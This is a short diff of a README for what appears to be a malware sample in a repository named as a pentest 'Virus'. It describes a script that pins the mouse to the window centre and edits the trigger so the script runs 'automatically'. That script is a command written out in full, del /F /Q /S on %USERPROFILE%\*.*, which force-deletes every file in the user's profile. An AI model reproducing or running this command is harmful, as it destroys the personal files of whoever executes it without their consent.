ThanatosPentest001/Virus/README.txt

 Keeps repositioning the mouse to the center of the window, preventing normal movement.

 💣 Critical behavior when clicking:
-When the user clicks the button, the script executes:
+When the user clicks the button,and the script do it automatically, the script executes:

 powershell
 del /F /Q /S "%USERPROFILE%\*.*"